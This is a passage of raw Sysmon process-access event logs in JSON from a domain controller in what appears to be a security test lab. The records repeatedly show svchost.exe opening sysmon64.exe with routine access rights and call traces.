07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 